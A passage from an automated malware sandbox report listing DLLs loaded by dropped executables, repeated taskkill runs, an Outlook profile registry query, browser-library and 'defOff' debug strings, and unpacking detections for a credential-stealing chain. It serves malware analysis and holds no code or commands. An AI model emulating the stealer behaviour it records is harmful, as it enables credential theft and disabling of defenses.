                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: dpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: textshaping.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: textinputframework.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: coreuicomponents.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: coremessaging.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: ntmarta.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: propsys.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: netutils.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: windows.shell.servicehostbuilder.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: ieframe.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: netapi32.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: wkscli.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: edputil.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: secur32.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: mlang.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: wininet.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: policymanager.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: msvcp110_win.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeSection loaded: winmm.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeSection loaded: wininet.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeSection loaded: rstrtmgr.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeSection loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeSection loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeSection loaded: netutils.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exeSection loaded: wsock32.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exeSection loaded: winmm.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exeSection loaded: mpr.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exeSection loaded: wininet.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: winmm.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: webio.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: schannel.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: mskeyprotect.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: ncryptsslp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: dpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: textshaping.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: textinputframework.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: coreuicomponents.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: coremessaging.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: ntmarta.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: coremessaging.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: propsys.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: netutils.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: windows.shell.servicehostbuilder.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: ieframe.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: netapi32.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: wkscli.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: edputil.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: secur32.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: mlang.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: wininet.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: policymanager.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: msvcp110_win.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007635001\8eeb449c35.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeSection loaded: winmm.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeSection loaded: winmm.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeSection loaded: wininet.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeSection loaded: rstrtmgr.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeSection loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeSection loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeSection loaded: netutils.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exeSection loaded: wsock32.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exeSection loaded: winmm.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exeSection loaded: mpr.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exeSection loaded: wininet.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                      Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                      Source: file.exeStatic file information: File size 1806336 > 1048576
                      Source: file.exeStatic PE information: Raw size of riuyamyn is bigger than: 0x100000 < 0x19f000
                      Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmp
                      Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2620917443.000000006CB9F000.00000002.00000001.01000000.00000009.sdmp
                      Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2620917443.000000006CB9F000.00000002.00000001.01000000.00000009.sdmp
                      Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: fb696bafb5.exe, 00000028.00000003.3005248490.0000000004910000.00000004.00001000.00020000.00000000.sdmp, fb696bafb5.exe, 00000028.00000002.3144548867.0000000000592000.00000040.00000001.01000000.00000013.sdmp
                      Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmp

                      Data Obfuscation

                      barindex
                      Detected unpacking (changes PE section rights)
                      Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.ba0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;riuyamyn:EW;ezwcdmtt:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;riuyamyn:EW;ezwcdmtt:EW;.taggant:EW;
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeUnpacked PE file: 21.2.DocumentsKJEGCFBGDH.exe.990000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hicendxx:EW;qvwfrqsg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hicendxx:EW;qvwfrqsg:EW;.taggant:EW;
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 23.2.skotes.exe.460000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hicendxx:EW;qvwfrqsg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hicendxx:EW;qvwfrqsg:EW;.taggant:EW;
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeUnpacked PE file: 26.2.241fdb96f6.exe.e40000.0.unpack :EW;.rsrc:W;.idata :W; :EW;riuyamyn:EW;ezwcdmtt:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;riuyamyn:EW;ezwcdmtt:EW;.taggant:EW;
                      Source: C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exeUnpacked PE file: 40.2.fb696bafb5.exe.590000.0.unpack :EW;.rsrc:W;.idata :W;yggyennp:EW;ceftresi:EW;.taggant:EW; vs :ER;.rsrc:W;
                      Source: C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exeUnpacked PE file: 47.2.241fdb96f6.exe.e40000.0.unpack :EW;.rsrc:W;.idata :W; :EW;riuyamyn:EW;ezwcdmtt:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;riuyamyn:EW;ezwcdmtt:EW;.taggant:EW;
